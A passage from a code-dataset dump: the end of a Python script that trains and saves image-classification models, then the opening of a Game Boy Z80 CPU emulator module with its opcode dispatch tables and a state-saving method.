lr_decay=hparams['lr_decay'],
update_rule=hparams['update'],
optim_config={
'learning_rate': hparams['lr'],
},
verbose=True, print_every=50)
log( "Started training model: %s" % (name,), name=name )
log( " Hyper-parameters: %s" % (str(hparams),), name=name )
solver.train()
log( " Validation Accuracy: %f" % (solver.best_val_acc,) , name=name )
log( "Finished training", name=name )
val_accs.append(solver.best_val_acc)
if solver.best_val_acc > best_val_acc:
best_val_acc = solver.best_val_acc
best_model = model
best_solver = solver
log( "", name=name )
best_model.name = name
best_model.validation_accuracy = best_val_acc
best_model.save(model_name)
#plot_solver(best_solver)
print val_accs
# print('\a') # Sound a bell
# print('\a')
# print('\a')
def classify(data):
model = load_malpi('SimpleTest1.pickle')
scores = model.loss(data)
print scores
def testload():
model = load_malpi('SimpleTest1.pickle')
data = getCIFAR10(verbose=False)
solver = Solver(model, data)
train_acc = solver.check_accuracy(data["X_train"], data["y_train"], num_samples=1000)
val_acc = solver.check_accuracy(data["X_val"], data["y_val"])
print "train acc: %f; val_acc: %f" % (train_acc,val_acc)
def testIM2COL():
conv_param = {'filter_size':3, 'stride':1, 'pad':1 }
x = np.zeros((1,3,32,32))
w = np.zeros((8, 3, 3, 3))
b = np.zeros(8)
x = x.astype(np.float32)
w = w.astype(np.float32)
b = b.astype(np.float32)
conv_forward_im2col(x, w, b, conv_param)
#Try: Conv-64, Conv-64, maxpool, conv-128, conv-128, maxpool, conv-256, conv-256, maxpool, conv-512, conv-512, maxpool, conv-512, conv-512, maxpool, FC-4096, FC-4096, FC-1000, softmax
def describeModel( name ):
model = load_malpi(name+'.pickle')
# if not hasattr(model, 'input_dim'):
# model.input_dim = {}
model.describe()
# model.save(name+'.pickle')
def getOptions():
parser = OptionParser()
parser.add_option("-d","--describe",dest="name",help="Describe a model saved in a pickle file: <name>.pickle");
(options, args) = parser.parse_args()
return (options, args)
if __name__ == "__main__":
(options, args) = getOptions()
if options.name:
describeModel(options.name)
else:
train()
#testIM2COL()
|
mit
| 7,756,415,624,282,956,000
| 32.788235
| 183
| 0.584784
| false
| 3.021568
| true
| false
| false
|
tomis007/pyboi
|
pyboi/processor/z80.py
|
1
|
71153
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, PickleType
from ..base import Base
from ctypes import c_int8
from enum import Enum
import pickle
import logging
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(name='z80')
class CpuState(Base):
"""
SQLAlchemy base class to save cpustate.
...
Attributes
----------
id : int
primary key for database
savename : string
game save name
gbregisters : pickle
pickled list of the cpu registers A-F
stack_ptr : int
the stack pointer
program_ctr : int
the program counter
"""
__tablename__ = 'cpuState'
id = Column(Integer, primary_key=True)
savename = Column(String)
gbregisters = Column(PickleType)
stack_ptr = Column(Integer)
program_ctr = Column(Integer)
def __repr__(self):
return "<CPU_STATE(savename=%r>" % self.savename
class Z80():
"""
An implementation of the gameboy's ~z80 (similar) cpu.
...
Attributes
----------
reg : list of ints
        registers A, B, C, D, E, F, H, L in the z80 cpu
pc : int
program counter
sp : int
stack pointer
mem : Memory
memory object for this processor's memory
opcodes : Dictionary
function dictionary for dispatching the opcodes
"""
def __init__(self, mem):
"""
__init__ function
...
Refer to Z80 class documentation for attribute info.
"""
self.count = 0
self.reg = [0 for _ in range(8)]
# register index constants
self.A = 0
self.B = 1
self.C = 2
self.D = 3
self.E = 4
self.F = 5
self.H = 6
self.L = 7
# register enums
self.reg_pairs = Enum('RegPairs', 'HL BC DE AF')
self.load_vals = Enum('ImmediateByte', 'N NN SP')
self.HL = self.reg_pairs.HL
self.BC = self.reg_pairs.BC
self.DE = self.reg_pairs.DE
self.AF = self.reg_pairs.AF
self.N = self.load_vals.N
self.NN = self.load_vals.NN
self.SP = self.load_vals.SP
self.flags = Enum('Flags', 'Z N H C')
#pc/sp
self.pc = 0x100
self.sp = 0xfffe
self.interrupt_enable = False
self.mem = mem
#timers
self.div_clock = 0
self.tima_clock = 0
self.opcodes = {
0x76: lambda: self.halt(),
0xcb: lambda: self.extended_opcode(),
0xf3: lambda: self.disable_interrupts(),
0xd9: lambda: self.ret_interrupts(),
0x00: lambda: self.NOP(),
0x06: lambda: self.ld_byte_n(self.B),
0x0e: lambda: self.ld_byte_n(self.C),
0x16: lambda: self.ld_byte_n(self.D),
0x1e: lambda: self.ld_byte_n(self.E),
0x26: lambda: self.ld_byte_n(self.H),
0x2e: lambda: self.ld_byte_n(self.L),
0x7f: lambda: self.ld_r1_r2(self.A, self.A),
0x78: lambda: self.ld_r1_r2(self.A, self.B),
0x79: lambda: self.ld_r1_r2(self.A, self.C),
0x7a: lambda: self.ld_r1_r2(self.A, self.D),
0x7b: lambda: self.ld_r1_r2(self.A, self.E),
0x7c: lambda: self.ld_r1_r2(self.A, self.H),
0x7d: lambda: self.ld_r1_r2(self.A, self.L),
0x7e: lambda: self.ld_r1_r2(self.A, self.HL),
0x40: lambda: self.ld_r1_r2(self.B, self.B),
0x41: lambda: self.ld_r1_r2(self.B, self.C),
0x42: lambda: self.ld_r1_r2(self.B, self.D),
0x43: lambda: self.ld_r1_r2(self.B, self.E),
0x44: lambda: self.ld_r1_r2(self.B, self.H),
0x45: lambda: self.ld_r1_r2(self.B, self.L),
0x46: lambda: self.ld_r1_r2(self.B, self.HL),
0x48: lambda: self.ld_r1_r2(self.C, self.B),
0x49: lambda: self.ld_r1_r2(self.C, self.C),
0x4a: lambda: self.ld_r1_r2(self.C, self.D),
0x4b: lambda: self.ld_r1_r2(self.C, self.E),
0x4c: lambda: self.ld_r1_r2(self.C, self.H),
0x4d: lambda: self.ld_r1_r2(self.C, self.L),
0x4e: lambda: self.ld_r1_r2(self.C, self.HL),
0x50: lambda: self.ld_r1_r2(self.D, self.B),
0x51: lambda: self.ld_r1_r2(self.D, self.C),
0x52: lambda: self.ld_r1_r2(self.D, self.D),
0x53: lambda: self.ld_r1_r2(self.D, self.E),
0x54: lambda: self.ld_r1_r2(self.D, self.H),
0x55: lambda: self.ld_r1_r2(self.D, self.L),
0x56: lambda: self.ld_r1_r2(self.D, self.HL),
0x58: lambda: self.ld_r1_r2(self.E, self.B),
0x59: lambda: self.ld_r1_r2(self.E, self.C),
0x5a: lambda: self.ld_r1_r2(self.E, self.D),
0x5b: lambda: self.ld_r1_r2(self.E, self.E),
0x5c: lambda: self.ld_r1_r2(self.E, self.H),
0x5d: lambda: self.ld_r1_r2(self.E, self.L),
0x5e: lambda: self.ld_r1_r2(self.E, self.HL),
0x60: lambda: self.ld_r1_r2(self.H, self.B),
0x61: lambda: self.ld_r1_r2(self.H, self.C),
0x62: lambda: self.ld_r1_r2(self.H, self.D),
0x63: lambda: self.ld_r1_r2(self.H, self.E),
0x64: lambda: self.ld_r1_r2(self.H, self.H),
0x65: lambda: self.ld_r1_r2(self.H, self.L),
0x66: lambda: self.ld_r1_r2(self.H, self.HL),
0x68: lambda: self.ld_r1_r2(self.L, self.B),
0x69: lambda: self.ld_r1_r2(self.L, self.C),
0x6a: lambda: self.ld_r1_r2(self.L, self.D),
0x6b: lambda: self.ld_r1_r2(self.L, self.E),
0x6c: lambda: self.ld_r1_r2(self.L, self.H),
0x6d: lambda: self.ld_r1_r2(self.L, self.L),
0x6e: lambda: self.ld_r1_r2(self.L, self.HL),
0x70: lambda: self.ld_r1_r2(self.HL, self.B),
0x71: lambda: self.ld_r1_r2(self.HL, self.C),
0x72: lambda: self.ld_r1_r2(self.HL, self.D),
0x73: lambda: self.ld_r1_r2(self.HL, self.E),
0x74: lambda: self.ld_r1_r2(self.HL, self.H),
0x75: lambda: self.ld_r1_r2(self.HL, self.L),
0x36: lambda: self.ld_r1_r2(self.HL, self.N),
0x0a: lambda: self.load_a(self.BC),
0x1a: lambda: self.load_a(self.DE),
0xfa: lambda: self.load_a(self.NN),
0x3e: lambda: self.load_a(self.N),
0x7f: lambda: self.write_a(self.A),
0x47: lambda: self.write_a(self.B),
0x4f: lambda: self.write_a(self.C),
0x57: lambda: self.write_a(self.D),
0x5f: lambda: self.write_a(self.E),
0x67: lambda: self.write_a(self.H),
0x6f: lambda: self.write_a(self.L),
0x02: lambda: self.write_a(self.BC),
0x12: lambda: self.write_a(self.DE),
0x77: lambda: self.write_a(self.HL),
0xea: lambda: self.write_a(self.NN),
0xf2: lambda: self.load_a_c(store=False),
0xe2: lambda: self.load_a_c(store=True),
0x3a: lambda: self.load_a_hl(dec=True, load=True),
0x32: lambda: self.load_a_hl(dec=True, load=False),
0x2a: lambda: self.load_a_hl(dec=False, load=True),
0x22: lambda: self.load_a_hl(dec=False, load=False),
0xe0: lambda: self.a_n(True),
0xf0: lambda: self.a_n(False),
0x01: lambda: self.ld_nn(self.BC, set_sp=False),
0x11: lambda: self.ld_nn(self.DE, set_sp=False),
0x21: lambda: self.ld_nn(self.HL, set_sp=False),
0x31: lambda: self.ld_nn(self.sp, set_sp=True),
0xf9: lambda: self.ld_sp_hl(),
0xf8: lambda: self.ldhl_sp(),
0x08: lambda: self.ld_nn_sp(),
0xf5: lambda: self.push_nn(self.A, self.F),
0xc5: lambda: self.push_nn(self.B, self.C),
0xd5: lambda: self.push_nn(self.D, self.E),
0xe5: lambda: self.push_nn(self.H, self.L),
0xf1: lambda: self.pop_nn(self.A, self.F),
0xc1: lambda: self.pop_nn(self.B, self.C),
0xd1: lambda: self.pop_nn(self.D, self.E),
0xe1: lambda: self.pop_nn(self.H, self.L),
0x87: lambda: self.add_a_n(self.A, add_carry=False),
0x80: lambda: self.add_a_n(self.B, add_carry=False),
0x81: lambda: self.add_a_n(self.C, add_carry=False),
0x82: lambda: self.add_a_n(self.D, add_carry=False),
0x83: lambda: self.add_a_n(self.E, add_carry=False),
0x84: lambda: self.add_a_n(self.H, add_carry=False),
0x85: lambda: self.add_a_n(self.L, add_carry=False),
0x86: lambda: self.add_a_n(self.HL, add_carry=False),
0xc6: lambda: self.add_a_n(self.N, add_carry=False),
0x8f: lambda: self.add_a_n(self.A, add_carry=True),
0x88: lambda: self.add_a_n(self.B, add_carry=True),
0x89: lambda: self.add_a_n(self.C, add_carry=True),
0x8a: lambda: self.add_a_n(self.D, add_carry=True),
0x8b: lambda: self.add_a_n(self.E, add_carry=True),
0x8c: lambda: self.add_a_n(self.H, add_carry=True),
0x8d: lambda: self.add_a_n(self.L, add_carry=True),
0x8e: lambda: self.add_a_n(self.HL, add_carry=True),
0xce: lambda: self.add_a_n(self.N, add_carry=True),
0x97: lambda: self.sub_a_n(self.A, sub_carry=False),
0x90: lambda: self.sub_a_n(self.B, sub_carry=False),
0x91: lambda: self.sub_a_n(self.C, sub_carry=False),
0x92: lambda: self.sub_a_n(self.D, sub_carry=False),
0x93: lambda: self.sub_a_n(self.E, sub_carry=False),
0x94: lambda: self.sub_a_n(self.H, sub_carry=False),
0x95: lambda: self.sub_a_n(self.L, sub_carry=False),
0x96: lambda: self.sub_a_n(self.HL, sub_carry=False),
0xd6: lambda: self.sub_a_n(self.N, sub_carry=False),
0x9f: lambda: self.sub_a_n(self.A, sub_carry=True),
0x98: lambda: self.sub_a_n(self.B, sub_carry=True),
0x99: lambda: self.sub_a_n(self.C, sub_carry=True),
0x9a: lambda: self.sub_a_n(self.D, sub_carry=True),
0x9b: lambda: self.sub_a_n(self.E, sub_carry=True),
0x9c: lambda: self.sub_a_n(self.H, sub_carry=True),
0x9d: lambda: self.sub_a_n(self.L, sub_carry=True),
0x9e: lambda: self.sub_a_n(self.HL, sub_carry=True),
0xde: lambda: self.sub_a_n(self.N, sub_carry=True),
0xa7: lambda: self.and_n(self.A),
0xa0: lambda: self.and_n(self.B),
0xa1: lambda: self.and_n(self.C),
0xa2: lambda: self.and_n(self.D),
0xa3: lambda: self.and_n(self.E),
0xa4: lambda: self.and_n(self.H),
0xa5: lambda: self.and_n(self.L),
0xa6: lambda: self.and_n(self.HL),
0xe6: lambda: self.and_n(self.N),
0xb7: lambda: self.or_n(self.A, exclusive_or=False),
0xb0: lambda: self.or_n(self.B, exclusive_or=False),
0xb1: lambda: self.or_n(self.C, exclusive_or=False),
0xb2: lambda: self.or_n(self.D, exclusive_or=False),
0xb3: lambda: self.or_n(self.E, exclusive_or=False),
0xb4: lambda: self.or_n(self.H, exclusive_or=False),
0xb5: lambda: self.or_n(self.L, exclusive_or=False),
0xb6: lambda: self.or_n(self.HL, exclusive_or=False),
0xf6: lambda: self.or_n(self.N, exclusive_or=False),
0xaf: lambda: self.or_n(self.A, exclusive_or=True),
0xa8: lambda: self.or_n(self.B, exclusive_or=True),
0xa9: lambda: self.or_n(self.C, exclusive_or=True),
0xaa: lambda: self.or_n(self.D, exclusive_or=True),
0xab: lambda: self.or_n(self.E, exclusive_or=True),
0xac: lambda: self.or_n(self.H, exclusive_or=True),
0xad: lambda: self.or_n(self.L, exclusive_or=True),
0xae: lambda: self.or_n(self.HL, exclusive_or=True),
0xee: lambda: self.or_n(self.N, exclusive_or=True),
0xbf: lambda: self.cp_n(self.A),
0xb8: lambda: self.cp_n(self.B),
0xb9: lambda: self.cp_n(self.C),
0xba: lambda: self.cp_n(self.D),
0xbb: lambda: self.cp_n(self.E),
0xbc: lambda: self.cp_n(self.H),
0xbd: lambda: self.cp_n(self.L),
0xbe: lambda: self.cp_n(self.HL),
0xfe: lambda: self.cp_n(self.N),
0x3c: lambda: self.inc_n(self.A),
0x04: lambda: self.inc_n(self.B),
0x0c: lambda: self.inc_n(self.C),
0x14: lambda: self.inc_n(self.D),
0x1c: lambda: self.inc_n(self.E),
0x24: lambda: self.inc_n(self.H),
0x2c: lambda: self.inc_n(self.L),
0x34: lambda: self.inc_n(self.HL),
0x3d: lambda: self.dec_n(self.A),
0x05: lambda: self.dec_n(self.B),
0x0d: lambda: self.dec_n(self.C),
0x15: lambda: self.dec_n(self.D),
0x1d: lambda: self.dec_n(self.E),
0x25: lambda: self.dec_n(self.H),
0x2d: lambda: self.dec_n(self.L),
0x35: lambda: self.dec_n(self.HL),
0x09: lambda: self.add_hl(self.B, self.C, add_sp=False),
0x19: lambda: self.add_hl(self.D, self.E, add_sp=False),
0x29: lambda: self.add_hl(self.H, self.L, add_sp=False),
0x39: lambda: self.add_hl(self.B, self.C, add_sp=True),
0xe8: lambda: self.add_sp_n(),
0x03: lambda: self.inc_nn(self.B, self.C, inc_sp=False),
0x13: lambda: self.inc_nn(self.D, self.E, inc_sp=False),
0x23: lambda: self.inc_nn(self.H, self.L, inc_sp=False),
0x33: lambda: self.inc_nn(self.B, self.C, inc_sp=True),
0x0b: lambda: self.dec_nn(self.B, self.C, dec_sp=False),
0x1b: lambda: self.dec_nn(self.D, self.E, dec_sp=False),
0x2b: lambda: self.dec_nn(self.H, self.L, dec_sp=False),
0x3b: lambda: self.dec_nn(self.B, self.C, dec_sp=True),
0xc3: lambda: self.jump_nn(),
0xc2: lambda: self.jump_cc(False, self.flags.Z, immmediate_jump=False),
0xca: lambda: self.jump_cc(True, self.flags.Z, immmediate_jump=False),
0xd2: lambda: self.jump_cc(False, self.flags.C, immmediate_jump=False),
0xda: lambda: self.jump_cc(True, self.flags.C, immmediate_jump=False),
0xe9: lambda: self.jump_hl(),
0x18: lambda: self.jump_n(),
0x20: lambda: self.jump_cc(False, self.flags.Z, immmediate_jump=True),
0x28: lambda: self.jump_cc(True, self.flags.Z, immmediate_jump=True),
0x30: lambda: self.jump_cc(False, self.flags.C, immmediate_jump=True),
0x38: lambda: self.jump_cc(True, self.flags.C, immmediate_jump=True),
0x27: lambda: self.dec_adjust(),
0x2f: lambda: self.complement_a(),
0x3f: lambda: self.complement_cf(),
0x37: lambda: self.set_cf(),
0x07: lambda: self.rotate_l_a_c(),
0x17: lambda: self.rotate_l_a(),
0x0f: lambda: self.rotate_r_a_c(),
0x1f: lambda: self.rotate_r_a(),
0xcd: lambda: self.call(),
0xc4: lambda: self.call_cc(self.flags.Z, False),
0xcc: lambda: self.call_cc(self.flags.Z, True),
0xd4: lambda: self.call_cc(self.flags.C, False),
0xdc: lambda: self.call_cc(self.flags.C, True),
0xc9: lambda: self.ret(),
0xc0: lambda: self.ret_cc(self.flags.Z, False),
0xc8: lambda: self.ret_cc(self.flags.Z, True),
0xd0: lambda: self.ret_cc(self.flags.C, False),
0xd8: lambda: self.ret_cc(self.flags.C, True),
0x10: lambda: self.stop(),
0xc7: lambda: self.restart(0x00),
0xcf: lambda: self.restart(0x08),
0xd7: lambda: self.restart(0x10),
0xdf: lambda: self.restart(0x18),
0xe7: lambda: self.restart(0x20),
0xef: lambda: self.restart(0x28),
0xf7: lambda: self.restart(0x30),
0xff: lambda: self.restart(0x38),
0xfb: lambda: self.enable_interrupts()
}
self.ext_opcodes = {
0x3f: lambda: self.srl_n(self.A, False),
0x38: lambda: self.srl_n(self.B, False),
0x39: lambda: self.srl_n(self.C, False),
0x3a: lambda: self.srl_n(self.D, False),
0x3b: lambda: self.srl_n(self.E, False),
0x3c: lambda: self.srl_n(self.H, False),
0x3d: lambda: self.srl_n(self.L, False),
0x3e: lambda: self.srl_n(self.HL, False),
0x2f: lambda: self.srl_n(self.A, True),
0x28: lambda: self.srl_n(self.B, True),
0x29: lambda: self.srl_n(self.C, True),
0x2a: lambda: self.srl_n(self.D, True),
0x2b: lambda: self.srl_n(self.E, True),
0x2c: lambda: self.srl_n(self.H, True),
0x2d: lambda: self.srl_n(self.L, True),
0x2e: lambda: self.srl_n(self.HL, True),
0x1f: lambda: self.rr_n(self.A),
0x18: lambda: self.rr_n(self.B),
0x19: lambda: self.rr_n(self.C),
0x1a: lambda: self.rr_n(self.D),
0x1b: lambda: self.rr_n(self.E),
0x1c: lambda: self.rr_n(self.H),
0x1d: lambda: self.rr_n(self.L),
0x1e: lambda: self.rr_n(self.HL),
0x37: lambda: self.swap(self.A),
0x30: lambda: self.swap(self.B),
0x31: lambda: self.swap(self.C),
0x32: lambda: self.swap(self.D),
0x33: lambda: self.swap(self.E),
0x34: lambda: self.swap(self.H),
0x35: lambda: self.swap(self.L),
0x36: lambda: self.swap(self.HL),
0x27: lambda: self.sla_n(self.A),
0x20: lambda: self.sla_n(self.B),
0x21: lambda: self.sla_n(self.C),
0x22: lambda: self.sla_n(self.D),
0x23: lambda: self.sla_n(self.E),
0x24: lambda: self.sla_n(self.H),
0x25: lambda: self.sla_n(self.L),
0x26: lambda: self.sla_n(self.HL),
0x07: lambda: self.rotate_n_lc(self.A),
0x00: lambda: self.rotate_n_lc(self.B),
0x01: lambda: self.rotate_n_lc(self.C),
0x02: lambda: self.rotate_n_lc(self.D),
0x03: lambda: self.rotate_n_lc(self.E),
0x04: lambda: self.rotate_n_lc(self.H),
0x05: lambda: self.rotate_n_lc(self.L),
0x06: lambda: self.rotate_n_lc(self.HL),
0x17: lambda: self.rotate_l_n(self.A),
0x10: lambda: self.rotate_l_n(self.B),
0x11: lambda: self.rotate_l_n(self.C),
0x12: lambda: self.rotate_l_n(self.D),
0x13: lambda: self.rotate_l_n(self.E),
0x14: lambda: self.rotate_l_n(self.H),
0x15: lambda: self.rotate_l_n(self.L),
0x16: lambda: self.rotate_l_n(self.HL),
0x0f: lambda: self.rrc_n(self.A),
0x08: lambda: self.rrc_n(self.B),
0x09: lambda: self.rrc_n(self.C),
0x0a: lambda: self.rrc_n(self.D),
0x0b: lambda: self.rrc_n(self.E),
0x0c: lambda: self.rrc_n(self.H),
0x0d: lambda: self.rrc_n(self.L),
0x0e: lambda: self.rrc_n(self.HL),
0x47: lambda: self.bit_br(0, self.A),
0x40: lambda: self.bit_br(0, self.B),
0x41: lambda: self.bit_br(0, self.C),
0x42: lambda: self.bit_br(0, self.D),
0x43: lambda: self.bit_br(0, self.E),
0x44: lambda: self.bit_br(0, self.H),
0x45: lambda: self.bit_br(0, self.L),
0x46: lambda: self.bit_br(0, self.HL),
0x4f: lambda: self.bit_br(1, self.A),
0x48: lambda: self.bit_br(1, self.B),
0x49: lambda: self.bit_br(1, self.C),
0x4a: lambda: self.bit_br(1, self.D),
0x4b: lambda: self.bit_br(1, self.E),
0x4c: lambda: self.bit_br(1, self.H),
0x4d: lambda: self.bit_br(1, self.L),
0x4e: lambda: self.bit_br(1, self.HL),
0x57: lambda: self.bit_br(2, self.A),
0x50: lambda: self.bit_br(2, self.B),
0x51: lambda: self.bit_br(2, self.C),
0x52: lambda: self.bit_br(2, self.D),
0x53: lambda: self.bit_br(2, self.E),
0x54: lambda: self.bit_br(2, self.H),
0x55: lambda: self.bit_br(2, self.L),
0x56: lambda: self.bit_br(2, self.HL),
0x5f: lambda: self.bit_br(3, self.A),
0x58: lambda: self.bit_br(3, self.B),
0x59: lambda: self.bit_br(3, self.C),
0x5a: lambda: self.bit_br(3, self.D),
0x5b: lambda: self.bit_br(3, self.E),
0x5c: lambda: self.bit_br(3, self.H),
0x5d: lambda: self.bit_br(3, self.L),
0x5e: lambda: self.bit_br(3, self.HL),
0x67: lambda: self.bit_br(4, self.A),
0x60: lambda: self.bit_br(4, self.B),
0x61: lambda: self.bit_br(4, self.C),
0x62: lambda: self.bit_br(4, self.D),
0x63: lambda: self.bit_br(4, self.E),
0x64: lambda: self.bit_br(4, self.H),
0x65: lambda: self.bit_br(4, self.L),
0x66: lambda: self.bit_br(4, self.HL),
0x6f: lambda: self.bit_br(5, self.A),
0x68: lambda: self.bit_br(5, self.B),
0x69: lambda: self.bit_br(5, self.C),
0x6a: lambda: self.bit_br(5, self.D),
0x6b: lambda: self.bit_br(5, self.E),
0x6c: lambda: self.bit_br(5, self.H),
0x6d: lambda: self.bit_br(5, self.L),
0x6e: lambda: self.bit_br(5, self.HL),
0x77: lambda: self.bit_br(6, self.A),
0x70: lambda: self.bit_br(6, self.B),
0x71: lambda: self.bit_br(6, self.C),
0x72: lambda: self.bit_br(6, self.D),
0x73: lambda: self.bit_br(6, self.E),
0x74: lambda: self.bit_br(6, self.H),
0x75: lambda: self.bit_br(6, self.L),
0x76: lambda: self.bit_br(6, self.HL),
0x7f: lambda: self.bit_br(7, self.A),
0x78: lambda: self.bit_br(7, self.B),
0x79: lambda: self.bit_br(7, self.C),
0x7a: lambda: self.bit_br(7, self.D),
0x7b: lambda: self.bit_br(7, self.E),
0x7c: lambda: self.bit_br(7, self.H),
0x7d: lambda: self.bit_br(7, self.L),
0x7e: lambda: self.bit_br(7, self.HL),
0xc7: lambda: self.set_b_r(self.A, 0, 1),
0xc0: lambda: self.set_b_r(self.B, 0, 1),
0xc1: lambda: self.set_b_r(self.C, 0, 1),
0xc2: lambda: self.set_b_r(self.D, 0, 1),
0xc3: lambda: self.set_b_r(self.E, 0, 1),
0xc4: lambda: self.set_b_r(self.H, 0, 1),
0xc5: lambda: self.set_b_r(self.L, 0, 1),
0xc6: lambda: self.set_b_r(self.HL, 0, 1),
0xcf: lambda: self.set_b_r(self.A, 1, 1),
0xc8: lambda: self.set_b_r(self.B, 1, 1),
0xc9: lambda: self.set_b_r(self.C, 1, 1),
0xca: lambda: self.set_b_r(self.D, 1, 1),
0xcb: lambda: self.set_b_r(self.E, 1, 1),
0xcc: lambda: self.set_b_r(self.H, 1, 1),
0xcd: lambda: self.set_b_r(self.L, 1, 1),
0xce: lambda: self.set_b_r(self.HL, 1, 1),
0xd7: lambda: self.set_b_r(self.A, 2, 1),
0xd0: lambda: self.set_b_r(self.B, 2, 1),
0xd1: lambda: self.set_b_r(self.C, 2, 1),
0xd2: lambda: self.set_b_r(self.D, 2, 1),
0xd3: lambda: self.set_b_r(self.E, 2, 1),
0xd4: lambda: self.set_b_r(self.H, 2, 1),
0xd5: lambda: self.set_b_r(self.L, 2, 1),
0xd6: lambda: self.set_b_r(self.HL, 2, 1),
0xdf: lambda: self.set_b_r(self.A, 3, 1),
0xd8: lambda: self.set_b_r(self.B, 3, 1),
0xd9: lambda: self.set_b_r(self.C, 3, 1),
0xda: lambda: self.set_b_r(self.D, 3, 1),
0xdb: lambda: self.set_b_r(self.E, 3, 1),
0xdc: lambda: self.set_b_r(self.H, 3, 1),
0xdd: lambda: self.set_b_r(self.L, 3, 1),
0xde: lambda: self.set_b_r(self.HL, 3, 1),
0xe7: lambda: self.set_b_r(self.A, 4, 1),
0xe0: lambda: self.set_b_r(self.B, 4, 1),
0xe1: lambda: self.set_b_r(self.C, 4, 1),
0xe2: lambda: self.set_b_r(self.D, 4, 1),
0xe3: lambda: self.set_b_r(self.E, 4, 1),
0xe4: lambda: self.set_b_r(self.H, 4, 1),
0xe5: lambda: self.set_b_r(self.L, 4, 1),
0xe6: lambda: self.set_b_r(self.HL, 4, 1),
0xef: lambda: self.set_b_r(self.A, 5, 1),
0xe8: lambda: self.set_b_r(self.B, 5, 1),
0xe9: lambda: self.set_b_r(self.C, 5, 1),
0xea: lambda: self.set_b_r(self.D, 5, 1),
0xeb: lambda: self.set_b_r(self.E, 5, 1),
0xec: lambda: self.set_b_r(self.H, 5, 1),
0xed: lambda: self.set_b_r(self.L, 5, 1),
0xee: lambda: self.set_b_r(self.HL, 5, 1),
0xf7: lambda: self.set_b_r(self.A, 6, 1),
0xf0: lambda: self.set_b_r(self.B, 6, 1),
0xf1: lambda: self.set_b_r(self.C, 6, 1),
0xf2: lambda: self.set_b_r(self.D, 6, 1),
0xf3: lambda: self.set_b_r(self.E, 6, 1),
0xf4: lambda: self.set_b_r(self.H, 6, 1),
0xf5: lambda: self.set_b_r(self.L, 6, 1),
0xf6: lambda: self.set_b_r(self.HL, 6, 1),
0xff: lambda: self.set_b_r(self.A, 7, 1),
0xf8: lambda: self.set_b_r(self.B, 7, 1),
0xf9: lambda: self.set_b_r(self.C, 7, 1),
0xfa: lambda: self.set_b_r(self.D, 7, 1),
0xfb: lambda: self.set_b_r(self.E, 7, 1),
0xfc: lambda: self.set_b_r(self.H, 7, 1),
0xfd: lambda: self.set_b_r(self.L, 7, 1),
0xfe: lambda: self.set_b_r(self.HL, 7, 1),
0x87: lambda: self.set_b_r(self.A, 0, 0),
0x80: lambda: self.set_b_r(self.B, 0, 0),
0x81: lambda: self.set_b_r(self.C, 0, 0),
0x82: lambda: self.set_b_r(self.D, 0, 0),
0x83: lambda: self.set_b_r(self.E, 0, 0),
0x84: lambda: self.set_b_r(self.H, 0, 0),
0x85: lambda: self.set_b_r(self.L, 0, 0),
0x86: lambda: self.set_b_r(self.HL, 0, 0),
0x8f: lambda: self.set_b_r(self.A, 1, 0),
0x88: lambda: self.set_b_r(self.B, 1, 0),
0x89: lambda: self.set_b_r(self.C, 1, 0),
0x8a: lambda: self.set_b_r(self.D, 1, 0),
0x8b: lambda: self.set_b_r(self.E, 1, 0),
0x8c: lambda: self.set_b_r(self.H, 1, 0),
0x8d: lambda: self.set_b_r(self.L, 1, 0),
0x8e: lambda: self.set_b_r(self.HL, 1, 0),
0x97: lambda: self.set_b_r(self.A, 2, 0),
0x90: lambda: self.set_b_r(self.B, 2, 0),
0x91: lambda: self.set_b_r(self.C, 2, 0),
0x92: lambda: self.set_b_r(self.D, 2, 0),
0x93: lambda: self.set_b_r(self.E, 2, 0),
0x94: lambda: self.set_b_r(self.H, 2, 0),
0x95: lambda: self.set_b_r(self.L, 2, 0),
0x96: lambda: self.set_b_r(self.HL, 2, 0),
0x9f: lambda: self.set_b_r(self.A, 3, 0),
0x98: lambda: self.set_b_r(self.B, 3, 0),
0x99: lambda: self.set_b_r(self.C, 3, 0),
0x9a: lambda: self.set_b_r(self.D, 3, 0),
0x9b: lambda: self.set_b_r(self.E, 3, 0),
0x9c: lambda: self.set_b_r(self.H, 3, 0),
0x9d: lambda: self.set_b_r(self.L, 3, 0),
0x9e: lambda: self.set_b_r(self.HL, 3, 0),
0xa7: lambda: self.set_b_r(self.A, 4, 0),
0xa0: lambda: self.set_b_r(self.B, 4, 0),
0xa1: lambda: self.set_b_r(self.C, 4, 0),
0xa2: lambda: self.set_b_r(self.D, 4, 0),
0xa3: lambda: self.set_b_r(self.E, 4, 0),
0xa4: lambda: self.set_b_r(self.H, 4, 0),
0xa5: lambda: self.set_b_r(self.L, 4, 0),
0xa6: lambda: self.set_b_r(self.HL, 4, 0),
0xaf: lambda: self.set_b_r(self.A, 5, 0),
0xa8: lambda: self.set_b_r(self.B, 5, 0),
0xa9: lambda: self.set_b_r(self.C, 5, 0),
0xaa: lambda: self.set_b_r(self.D, 5, 0),
0xab: lambda: self.set_b_r(self.E, 5, 0),
0xac: lambda: self.set_b_r(self.H, 5, 0),
0xad: lambda: self.set_b_r(self.L, 5, 0),
0xae: lambda: self.set_b_r(self.HL, 5, 0),
0xb7: lambda: self.set_b_r(self.A, 6, 0),
0xb0: lambda: self.set_b_r(self.B, 6, 0),
0xb1: lambda: self.set_b_r(self.C, 6, 0),
0xb2: lambda: self.set_b_r(self.D, 6, 0),
0xb3: lambda: self.set_b_r(self.E, 6, 0),
0xb4: lambda: self.set_b_r(self.H, 6, 0),
0xb5: lambda: self.set_b_r(self.L, 6, 0),
0xb6: lambda: self.set_b_r(self.HL, 6, 0),
0xbf: lambda: self.set_b_r(self.A, 7, 0),
0xb8: lambda: self.set_b_r(self.B, 7, 0),
0xb9: lambda: self.set_b_r(self.C, 7, 0),
0xba: lambda: self.set_b_r(self.D, 7, 0),
0xbb: lambda: self.set_b_r(self.E, 7, 0),
0xbc: lambda: self.set_b_r(self.H, 7, 0),
0xbd: lambda: self.set_b_r(self.L, 7, 0),
0xbe: lambda: self.set_b_r(self.HL, 7, 0)
}
def save_state(self, name, session):
"""
Save the cpu state into the SQLAlchemy session session.
...
Parameters
----------
name : string
name to associate with the save
session : A SQLAlchemy Session object
session to save the state in
Returns
-------
Human readable error message, or None on success
"""
pickledregisters = pickle.dumps(self.reg)
cpu_state = CpuState(savename=name, stack_ptr=self.sp,
program_ctr=self.pc,
gbregisters=pickledregisters)
session.add(cpu_state)
session.commit()
def init_boot(self):
"""
